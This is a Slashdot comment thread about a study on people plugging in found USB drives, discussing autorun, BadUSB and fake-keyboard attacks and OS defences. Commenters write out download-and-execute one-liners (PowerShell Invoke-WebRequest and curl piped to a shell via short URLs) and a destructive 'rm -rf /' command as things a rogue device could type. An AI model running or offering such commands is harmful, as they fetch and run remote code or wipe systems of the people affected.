A Lot of People Carelessly Plug In Random USB Drives Into Their Computers

An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.

I do the same thing with my penis

[Anonymous Coward]

Never know what STDs are there, but YOLO

Re:I do the same thing with my penis

[Xenx]

As this is Slashdot, I imagine your hand has been monogamous. Risk of STDs should be low.

People are stupid

[JustAnotherOldGuy]

People are stupid, film at 11.

Can't blame "people"; it's the industry's failing

[Anonymous Coward]

This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that doesn't require an obviously too trusting OS such as the most popular one that continues in this manner well after the idea has been well and truly discredited.

In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do w

Re:

[rahvin112]

You did see the malicious USB "drive" that was actually a transformer right (developed as an exhibit on how dangerous random USB can be)? It took about a second for it to build up 240V and send it back through the port. First pulse dropped the screen and probably everything else as well, the second pulse killed the whole laptop power system. And it all happened before you could even pull it. It also would keep pulsing until power to the port stopped.

Re:

[jellomizer]

Being that a dropped USB drive, is a rather expensive way to to try to infect a random PC. Unless you do so in some sort of work area, where you are hoping that the guy will do this to his work PC, so you can get onto the corporate network.
But if a guy picks it up and plugs it into his PC. You are spending a lot of money for little value.

However if you found someone's USB drive, you may be able to get valuable info from that and use it to your advantage, if you were of such a bad person to do so.

In terms of

Re:People are stupid

[BronsCon]

You can buy USB drives in bulk for under a buck a piece, they don't need to be high-capacity, a 128MB drive can hold a shitload of malware. $5 might be a bit on the expensive side to infect a random machine that may not even be your target, but $75 to infect 100 machines is cheap for a targeted attack.

Re: People are stupid

[bugs2squash]

So buy the small drive and print 64GB on the outside.

Re:People are stupid

[Dutch Gun]

It might be a pretty effective way to go spearphishing though. If you're trying to get into a specific high-value network, then this might be a great way to do it. Drop it outside the target office, label it something like "Private photos - do not view!" or something like that, and watch human nature take over.

Hopefully the administrator has properly hardened workstations against executing code on a random USB, but I'd bet a surprising number of networks would get infected in fairly short order.

Re:People are stupid

[AK Marc]

You put 10 spread around the parking lot with the name/logo of the company, or a competitor (or try both and see which hits best), and someone will "be nice" and try to see whose it is to return it, or something like that. The real reason scams don't work as well as they should is that scammers prey on the weak (419 scams), rather than preying on the good people.

And the people here claim that nothing can be hardened against USB. It could look like a memory stick, but have a keylogger that loads as a HID (often allowed for all), and has a USB-powered 3G modem for calling home and sending the keystrokes. Just blocking USB-loaded software won't do any good when you run into an attacker smarter than you.

Re:People are stupid [Not]

[Tablizer]

No, the people are NOT stupid.

Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.

The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.

Re:

[JustAnotherOldGuy]

No, the people are NOT stupid.

Thousands upon thousands of years of history disagree.

USB keyboard. Your computer DOES run the commands

[raymorris]

You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.

Re:

[nine-times]

That's clever, but the attack isn't going to be extremely simple to pull off. First, you have to know what kind of system you're plugged into-- what keyboard shortcuts will get you to a command line, what commands can be run at that command line. If the system is slower than you expect, if it takes too long to execute something, your input might not go where you expect it to. If the user is sitting in front of the computer at the time, there will be a limited span of time to execute what you want to, sin

WebRequest tinyurl.com/hfgrhd | powershell.exe

[raymorris]

Trying to do much through the GUI could be quite error-prone, though errors are acceptable. The more normal approach would be for the keyboard to run something like this single command for Windows, which tells the OS to download and run a script:

Win+R Invoke-WebRequest tinyurl.com/hfgrhd | powershell.exe

And / or this for Linux and Mac:
Ctrl-Alt+F1 curl http://tinyurl.com/hfhfh [tinyurl.com] | sh
Ctrl-Alt+F7

Powershell or /bin/sh takes over from there - the victim could yank the trojan device out and the malicious script wi

It downloads and runs a program

[raymorris]

There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:

Win+R powershell -command 'Invoke-WebRequest http...

Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).

Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd [tinyurl.com] and run them using powershell ".

The Linux/Unix/Mac version is similar:

curl http://tinyurl.com/hacker [tinyurl.com] | sh

Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.

Re:

[account_deleted]

Comment removed based on user account deletion

Re:

[Tablizer]

Being nasty, it tells the computer that it's a keyboard...

OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"

True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.

A partial solution would be to display a message and give the user 90 seconds to respond.

"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted.

Re:USB keyboard. Your computer DOES run the comman

[phantomfive]

Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.

Re:

[flyingfsck]

On BSD at least, you can lock the install to a specific USB keyboard ID, so then it won't accept a random HID.

Basically how I did it (first for screen saver loc

[raymorris]

That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.

At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.

Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.

Re:

[Killall -9 Bash]

I don't expect a screwdriver to mistrust all screws until trust can be established, and only turn screws that it trusts.

Is a computer a tool, or is it the wonderful new mechanical brain that will soon replace the meat in my skull?

Re:People are stupid

[green1]

Does your screwdriver jump up off your workbench and randomly start unscrewing things without asking first?

The problem isn't that you can run harmful code off a storage device, that's a know problem with an easy solution (don't be a moron). The problem is that the computer will AUTOMATICALLY run harmful code off a storage device by default unless you've done something to prevent it.

As long as a computer does what I ask it to, I can know what risks I'm taking, but if I can't even know if a USB stick is harmful until after it has done the harm, that's incredibly poor design.

Re:

[JustAnotherOldGuy]

I don't expect a screwdriver to mistrust all screws until trust can be established, and only turn screws that it trusts.

If your screwdriver could unscrew stuff by itself without your permission, you probably shouldn't trust it.

-

Is a computer a tool, or is it the wonderful new mechanical brain that will soon replace the meat in my skull?

For some people, it's both.

Re:

[Megol]

Operating systems are stupid.

Re:

[JustAnotherOldGuy]

I too would plug in a random USB stick. Without knowing the situation of the device I plug it into why would you assume that I am stupid?

Because plugging in a USB stick that you found laying around in the parking lot or other random place would be a stupid thing to do.

The chance of getting juicy selfies are a lot high

[viking80]

The chance of getting juicy selfies are a lot higher than getting infected.
Kind of like picking up an unknown person in a bar and having sex. Maybe even better odds or not getting infected. The study did not compare this.

Re:The chance of getting juicy selfies are a lot h

[Mr D from 63]

My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.

Re:The chance of getting juicy selfies are a lot h

[sexconker]

Yeah right.

I'm not most people, but I did exactly this (with an SD card).

I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.

I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.

She responded and sent her uncle to come pick it up.

He did.

Re:The chance of getting juicy selfies are a lot h

[ImprovOmega]

That was some epically beautiful nerdiness right there.

Re:

[thegarbz]

I think you have your statistics backwards. The number of people carrying around juicy selfies on a USB stick is considerably lower than the amount of USB sticks containing malware.

Mobile phone may be different.

Is this still true?

[cyber-vandal]

Does Windows still run things automatically from external media. I thought that had been changed in Win 7.

Re:Is this still true?

[gstoddart]

You pretty much need to disable it yourself, which means you need to know to do it.

Microsoft still treats auto-run like it's not a terrible idea.

It's actually kind of scary that anybody would keep doing that.

As far as I can see, Windows still excitedly runs anything it sees.

Re:

[Anonymous Coward]

A security n00b I see. You assume that it'll detect as storage and automatically run some executable. It's not hard to make a USB stick recognize as a keyboard and then have it start running commands, including opening a web browser and downloading anything needed to compromise your system. Never forget what can be done with a simple keyboard.

Besides, Windows doesn't autorun anything, it pops up a dialog and asks the user what they want to do.

Re:

[SQLGuru]

Just take a look at the USB Rubber Ducky sold by Hak5 (https://hak5.org/store). It'll emulate a keyboard and has a lot of available scripts for "penetration testing". I don't recommend going to that site from work since many businesses will treat it as a hacking site (even if the information is pertinent to your work).

Re:

[rudy_wayne]

Microsoft still treats auto-run like it's not a terrible idea.

Although Microsoft is certainly guilty of a lot of really bad design decisions, they are not alone. Almost every company that produces software seems to operate as if they've given zero consideration to security.

Re:

[Anonymous Coward]

The larger threat isn't old school "autoplay.exe" style infections. The real fun is in storage media that compromises a host by mere virtue of popping up on the bus following insertion, with no visible userland code execution required. -PCP

Re:Is this still true?

[Anonymous Coward]

First, malicious USB devices pretended to be CD readers because Windows would auto-run CDs but not mass storage (see U3, for supposedly non-malicious exploitation of this fact)

Then Windows started prompting the user before auto-run from CD drives also.

So now malicious USB devices present themselves as a keyboard and start typing commands (including hotkeys such as Win+R) to download and run malware off the net. USB keyboards can even interact with UAC prompts, even when presented on the Secure Desktop where software input emulation has no effect.

Re:

[Grishnakh]

This seems pretty easy to deal with. First off, a USB stick acting as a keyboard probably isn't going to get too far if it's plugged into a non-Windows computer, because all those hotkeys assume a Windows OS and probably won't work in a different environment.

But aside from that, the easy way to deal with this problem is to simply ask the user if they want to use the new keyboard they plugged in as a keyboard, or something to that effect (and only accept input from previously-known input devices until this

Re:Is this still true?

[lgw]

Bit of a bootstrapping issue there. When you plug in your first mouse or keyboard, what would you use to click "yes"?

Re:

[nine-times]

How about any unrecognized keyboard pops up with a window that says in big-bright letters, "You've just plugged in a new keyboard. Please type the following randomly-generated code into your keyboard to verify that you want to use this keyboard." It may be a bit annoying, but it only happens the first time you plug in a keyboard. In order for a malicious fake-keyboard to be recognized, the user either needs to type in the code anyway (which requires a certain level of stupidity) or the fake-keyboard need

Re:

[lgw]

And if the keyboard is a barcode scanner? Or a mini gaming keyboard with only the keys near WASD?

Re:

[sexconker]

our ke breaks.
ou bu a new keboard.
ou plug it in.
Windows asks if ou want to use the new keboard.
ou can't hit to accept.

Alsoourspacebarbreaks.

Andourenterkeorarrows.Andourmousetoo.OrmabeouunpluggedanofthemandpluggedthemintoadifferentportsoWindowsthinksthe'renewdevices.

Re:

[cfalcon]

Right, but unlike the other stuff, this one is pretty challenging. One reasonable guess might be to use the USB keyboard if and only if there's no other USB keyboard on the device, and prompt for if you meant to attach a keyboard if there's one present. This could also be done if there's either a keyboard OR a mouse. But if both are absent, and you plug in a keyboard or an attack drive that is secretly a keyboard, how on earth could you tell?

The fact that keyboards and mice are USB is the core issue- tha

Re:

[Paco103]

Hahahaha, you're funny! Running as non-administrator accounts. Windows doesn't even make this the slightest recommendation when you setup a new PC. Who cares about the 1% of PC's that will require an admin password. For 99% of them you just send the enter key after an action that will require elevated permissions.

non-admin accounts. . . you kill me :D ! What are people going to think of next?!?! Having your password secured somewhere other than that post it next to the screen?

Re:

[Calydor]

On the bright side, I am pretty sure they haven't made USB memory sticks yet that can read and parse the post-it on the monitor!

Re:

[sims 2]

it was changed in vista actually.

Back in winxp you could use something like ihound on your flashdrives to keep track of them.

http://www.cbsnews.com/news/re... [cbsnews.com]

But then vista wouldn't do the auto run so AFAIK no one else has made a lojack for flash drives.

Re:

[sims 2]

Of course it still has to have the correct driver installed to open it.

Want to be extra annoyed? plug it into a different usb port then it has to install the exact same driver again for the new port XD

Re:

[sexconker]

Don't forget the exact same interminable wait while it checks Windows Update for the same driver.

Re:

[flyingfsck]

Even nicer if you are doing R&D and use USB serial devices. Each time you plug a different one in, it gets a new device name. If have seen PCs with COM57: listed for the serial port.

Re:

[account_deleted]

Comment removed based on user account deletion

OS designers, not the customers are stupid.

[gurps_npc]

1) Given: People will take a random USB stick and plug it into a computer.

2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.

The minimal convenience of having auto-run for USB drives is far over-ridden by the huge security leak.

Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.

Re:

[cfalcon]

How do you distinguish betwixt an attack keyboard versus the user plugging in a real keyboard?

Re:

[Anonymous Coward]

USB drives can be set to short circuit a motherboard.

Conclusion: Don't plug unknown USB drives into your computer.

Re:

[ashshy]

Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.

And if there is a manual, it was probably delivered on a USB stick.

Re:

[thegarbz]

2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.

The OS is not the problem. OSes haven't auto-executed content on USB sticks for a long time. The problem is the USB subsystem itself. A stick could enumerate as any number of devices, including a keyboard and mouse and take control of the computer as the current user with absolutely zero possibility for the OS to do anything about it.

A USB device has also shown to do actual damage to hardware without the OS even running or the computer even being turned on.

Stop trying to idiot proof things. That never works

Mr. Robot

[show me altoids]

There is a scene in Mr. Robot where a girl dumps a bunch of infected USB stick in the parking lot of a police station, and a cop picks one up and plugs it into his computer. I thought this was rather far-fetched, but I guess not.

Re:

[Anonymous Coward]

Many of the attack-vectors displayed in Mr. Robot were so used because they have been successful in the real world.

Re:

[burtosis]

Its a pretty decent TV show, fairly creative. It won a golden globe and is on USA network. Ill probably watch the second season when it comes out.

Turn off autorun

[cmiller173]

I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.

Quick question

[Okian Warrior]

I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.

Just a quick question.

Suppose the device identifies as a USB keyboard, or identifies as a dual use device USB stick/keyboard?

Suppose the keyboard device is generic, doesn't require a driver, and the micro on the USB stick starts to type things on your computer.

Could that install malware on your system?

(Of course, I didn't need to identify keyboard devices specifically. There are a bunch of devices that a USB device can identify as, some of which allow data to be loaded onto your computer.)

Re:

[cmiller173]

I generally don't run with full admin privileges (ability to install) on my system, although that would certainly work on my wife's laptop. I really gotta get her PC locked down, damn the inconvenience.

Re:

[whoever57]

autorun is not the only vector. Years ago, I read about an attack that used vulnerabilities in the program (under Linux, I can't remember which desktop environment) that creates thumbnails from images. The advantage of this approach is that the USB stick can contain 1000s of images, each of which can try a slightly different attack.

don't eat candy from the ground, either

[Thud457]

USB drives?!

How about blindly trusting USB chargers from Alibaba/ebay?!
Or assuming that new USB-C cable from Amazon won't set your house on fire?!!!

Re:

[spire3661]

I just want to add that Amazon is only selling certified USB-C cables from now on. IT was a problem they decided to nip in the bud early.

Re:

[MightyYar]

I've busted apart some of those Ali/Ebay/Banggood USB chargers out of sheer morbid curiosity. Those things are so cheaply constructed that it is a physical impossibility that they would successfully negotiate a USB data connection. Even the supposed "hubs" lack capacitors, or even crystals for the controllers. Many of them even save money and omit the diode meant to prevent wall-wart supply voltage from feeding back to the host computer. They are way too busy ripping you off the old-fashioned way to take on

Is this really new?

[OzPeter]

I heard of dropping random USB sticks in public places (10?) years ago for testing security (IIRC in the context of testing banks). That along with strategically dropping CD's in the bathrooms of companies with the CD's marked something like "Super secret HR layoff plan"

Ell no different then

[future assassin]

people picking up random hookers and plugging into them.

Penetration Testing 101

[wjcofkc]

You quickly drive through the employee parking\entry area of a bank. You toss half a dozen, maybe less, infected USB drives out your window on the way. I've only ever heard of that testing method used on banks, by genuine, hired security firms, but I imagine it could go a lot further. Needless to say it generally results in "Yay! free USB drives! Let's plug em in!" Then something phones home.

People are simple like that. Every so often someone asks me what the best way to crack (misc.) password is. I tell them to ask for it.

Automatically good?

[capntao]

"a USB stick given away at a trade show is automatically good." the hell ever gave you that idea? a USB stick in original packaging could have malware all up ins for all you know.

Re:

[sims 2]

https://it.slashdot.org/story/... [slashdot.org]

yeah brand new drives straight from the manufacturer.

USB authorization

[rastos1]

That's why we have USB authorization [kernel.org]. Since 2007.

What kind of dumb OS...

[Pfhorrest]

What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?

Oh right, Windows. Well, there's your problem.

Re:

[Anonymous Coward]

It doesn't even have to involve autorun: https://www.blackhat.com/us-14/briefings.html#badusb-on-accessories-that-turn-evil

Once reprogrammed, benign devices can turn malicious in many ways, including:

A device can emulate a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware. Such malware, in turn, can infect the controller chips of other USB devices connected to the computer.
The device can a

Screw all the drives!

[PessimysticRaven]

Blame the OS? Nope. I'll blame the Operator, not the Operating System.

Woah!

[fullback]

The intro says: "The problem isn't that people are idiots..."

Let's stop right there. I know for a fact that this premise is wrong.

Trust your own

[U2xhc2hkb3QgU3Vja3M]

As a Canadian, I cannot trust either China nor the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.

In other news

[tom229]

The sun rose in the East today and set in the West. More at 11.

Still?

[QuietLagoon]

From Wired in 2011 The dropped drive hack [wired.com].

...They say that Stuxnet got deployed like this. Awesome hack, Stuxnet....

Staff secretly dropped computer discs and USB thumb drives in the parking lots of government buildings and private contractors. Of those who picked them up, 60 percent plugged the devices into office computers, curious to see what they contained. If the drive or CD case had an official logo, 90 percent were installed....

Not only USB "Drives"

[fullmetal55]

Commvault gave away as swag a few years ago (2011 I believe), a device that looked like a common trade show USB key. However instead of being an actual useful USB key, (it wasn't even a storage device) it behaved like a USB keyboard, upon loading, hit winkey - R, and typed in a webpage, (you could see the letters type across the screen). When I first saw those, it wasn't hard to imagine how easily those could be abused for just this scenario. Heck, you could theoretically have it do all kinds of sneaky

Windows Only?

[Agent0013]

Did they account for people who opened and looked at the USB key, but their computer did not auto-run whatever was on there that phoned home? What about people who have the auto-run disabled in Windows, or people who run a smarter OS, like perhaps Linux or Mac or BSD? (I'm not actually sure if these OS's are smarter than Windows, but it seems like they might be.)

In 1989, it was floppies

[mbone]

In 1989, people would plug random floppies into their computers. At least one early computer virus was spread that way. The more things change...

Re:

[jfdavis668]

Almost all early computer viruses spread this way.

Re:

[Cro Magnon]

At least the floppies didn't auto-run. You were safe unless you actually booted the computer with the durn thing.

Old news, but somehow still relevant.

[Euphorinaut]

I have mixed feelings every time I see this. Every time I see one of these articles come across, there's a flood of comments about how its not news, and each time I see it I lean closer to the notion that this paradox of "non-news" that in and of itself is caused by a lack of awareness(which can only be remedied by news) might be dragging along by the dead weight of our habit to only share this knowledge with the tech crowd that already knows about it. This knowledge can only do so much unless it makes its

But how about porn?

[Parker Lewis]

It has a small chance to have porn content, or at least, nudes! I can take that risk!

Well, then fix it.

[bmo]

The problem is that the OS will automatically run a program that can install malware from a USB stick.

Mine doesn't. I know of no Linux or BSD machine that automagically runs any kind of +x'ed code on any kind of removable media.

At least not out of the box. Gee, I wonder what OS is designed for "convenience" rather than protecting the user, and their computer.

Does it start with a W?

--
BMO

The issue isn't People - it's the Autoplay

[wardrich86]

If you put a floppy in your computer, would it autoplay? No.

Do your external hard drives autoplay when you put them in? Nope!

The issue here is the bullshit autoplay. CDs and DVDs are guilty of that as well. I have no idea why it's a default feature on computers... the default should be to just open the volume like a drive to allow you to peruse the files on the medium and select what you want to open.

IMO this is a HUGE failure on the OS and whoever decided to allow Auto Play to be a thing.

What about killer USB?

[Joe_Dragon]

https://motherboard.vice.com/r... [vice.com]

Really?

[twotacocombo]

The problem isn't that people are idiots

Yes, it is. Would you pick up a random needle off the street and stick it into your vein, then wonder how you got AIDS? Would you stick your dick in some random person you found behind a 7-11, then wonder how you got the clap? It's not the computers fault you stuck an unknown, infected USB drive in it. Take some responsibility for your actions already. This is absolutely nobody's fault but your own, so stop doing stupid shit and then playing the victim card.

The problem is that it isn't safe to plug a USB stick into a computer.

Bullshit. It's perfectly safe to insert a USB sti

Real or mock mocking!

[ramriot]

Should we also mock Bruce for saying:-
"The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good."

I would say the latter is still suspect, what with Bad-USB firmware and other stuff, just because someone you trust gives you something, the trust does not extend to the something.

Sounds like a business opportunity

[davidwr]

First person to invent a cheap, provably secure, not-already-patent/intellectual-property-encumbered "USB condom" (really, a very small computer) that sits between my computer and a USB stick which disables boot, Windows-auto-run, device-driver shenanigans, and the like gets the win.

--
One of many possible ways to do this:
* Assume the device is a generic USB memory stick. If it's not, fail.
* If it is, attempt to access the files using generic methods. If it doesn't work, fail.
* If it's not a recognized fil

No shit sherlock?

[Austerity Empowers]

I think this story runs once a year, choir having been preached to, problem continues.

Re:

[GLMDesigns]

Most people have no clue what a VM is. This includes highly intelligent and educated people.

Re:disable auto-run

[Tuidjy]

The problem is that the USB drive can identify as a different kind of device, like a keyboard, run commands, download and install software, and even interact with the security modal screens.

Re:

[cfalcon]

The problem is that you just plugged in a keyboard, and it will execute command keys and type stuff in to make itself able to run remote code.

Re:

[U2xhc2hkb3QgU3Vja3M]

Short story: do this in a VM.

Re:

[Joe_Dragon]

sudo rm -rf / --no-preserve-root

from the fake keyboard.

Re:

[sims 2]

No,
No
and
No.

Re:

[Joe_Dragon]

Tried to update the raid firmware with out shutting down data usage? Forced an unclean reboot to the diagnostics?